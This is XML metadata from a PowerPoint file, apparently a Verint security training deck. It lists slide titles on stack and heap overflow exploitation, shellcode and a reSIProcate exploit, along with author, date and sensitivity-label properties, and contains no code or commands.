      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Buffer overflow vulnerabilities: stack memory allocation</vt:lpstr>
      <vt:lpstr>Buffer overflow vulnerabilities: stack grows down</vt:lpstr>
      <vt:lpstr>  Stack overflow vulnerabilities: a “hello world!”                                                                                        example (2001)   </vt:lpstr>
      <vt:lpstr>Stack overflow vulnerabilities: a “hello^H^Hp world!”                                                                                              example (2001)  </vt:lpstr>
      <vt:lpstr>Stack overflow vulnerabilities: a “help wooo … ooorld!”                                                                                      example (2001) </vt:lpstr>
      <vt:lpstr>Stack overflow vulnerabilities: shellcode                                                                                                 example (2001)</vt:lpstr>
      <vt:lpstr>Buffer overflow vulnerabilities: heap memory allocation</vt:lpstr>
      <vt:lpstr>Heap overflow vulnerabilities: write-4 exploit primitive (2001)</vt:lpstr>
      <vt:lpstr>Heap overflow vulnerabilities: write-4 exploit primitive                                                                        (Phrack magazine, 2001)</vt:lpstr>
      <vt:lpstr>Heap overflow vulnerabilities:                              Windows XP SP2 heap verification checks</vt:lpstr>
      <vt:lpstr>reSIProcate heap overflow vulnerability</vt:lpstr>
      <vt:lpstr>reSIProcate heap overflow vulnerability:                                                                  the vulnerable code</vt:lpstr>
      <vt:lpstr>reSIProcate heap overflow vulnerability: XP SP3 exploit</vt:lpstr>
      <vt:lpstr>reSIProcate heap overflow vulnerability: XP SP3 exploit</vt:lpstr>
      <vt:lpstr>Bypassing executable space protection</vt:lpstr>
      <vt:lpstr>Heap overflow vulnerabilities:                       Windows Vista/Server 2008/7 heap hardening</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Challenge</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Verint Systems,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VerintCIS PowerPoint Template 16x9_4jan2018</dc:title>
  <dc:creator>Yogev, Rotem</dc:creator>
  <cp:lastModifiedBy>Doroteya Ivanova</cp:lastModifiedBy>
  <cp:revision>167</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-12-17T11:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-07T13:50:57Z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0x01010052449E0226D72C4EA871ED8E19223534</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MSIP_Label_f9cf2da1-2c3f-45d0-b055-2ede070a0b5f_Enabled">
    <vt:lpwstr>True</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="MSIP_Label_f9cf2da1-2c3f-45d0-b055-2ede070a0b5f_SiteId">
    <vt:lpwstr>bb2ed304-4099-49cf-b081-cbb7a3a580ca</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="MSIP_Label_f9cf2da1-2c3f-45d0-b055-2ede070a0b5f_Owner">
    <vt:lpwstr>Denitsa.Kurteva@verint.com</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="MSIP_Label_f9cf2da1-2c3f-45d0-b055-2ede070a0b5f_SetDate">
    <vt:lpwstr>2018-10-18T14:54:43.8924100Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_f9cf2da1-2c3f-45d0-b055-2ede070a0b5f_Name">
    <vt:lpwstr>Public</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_f9cf2da1-2c3f-45d0-b055-2ede070a0b5f_Application">
    <vt:lpwstr>Microsoft Azure Information Protection</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="MSIP_Label_f9cf2da1-2c3f-45d0-b055-2ede070a0b5f_Extended_MSFT_Method">
    <vt:lpwstr>Automatic</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="10" name="Sensitivity">
    <vt:lpwstr>Public</vt:lpwstr>
  </property>
</Properties>
</file>